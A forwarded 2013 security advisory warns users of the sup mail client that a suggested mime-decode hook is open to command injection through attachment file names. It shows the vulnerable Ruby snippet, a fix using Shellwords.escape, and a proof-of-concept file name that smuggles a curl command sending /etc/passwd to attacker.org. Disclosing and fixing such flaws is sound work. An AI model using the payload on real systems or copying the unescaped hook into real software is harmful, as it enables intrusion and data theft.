Fwd: Security issue with suggested configuration of sup

[Gaute Hope <eg@gaute.vetsj.com>]

Greetings suppers,

joernchen has pointed out to me that our suggested hook for viewing html
attachment has a serious security issue. The updated suggestion in [0] (wiki)
should be safer.


Please make sure that you update your mime-decode hook!


Best regards, Gaute



[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments



--- Begin forwarded message from joernchen ---
From: joernchen <...>
To: eg <eg@gaute.vetsj.com>
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup

[...]

At [0] the suggested configuration for viewing HTML attachments with
sup using the mime-decode hook is given as follows:

unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    `/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
  end
end

This piece of code however is prone to command injection via the file
name of the attached file. The command injection triggers upon sup
indexing the mail, so no user interaction is needed.

A better approach would be the following:

require 'shellwords'
unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`
  end
end

[...]

A simple PoC would be sending an email with a file attachment named
like:

'$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html

to a sup user making use of the suggested decode hook.

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

[...]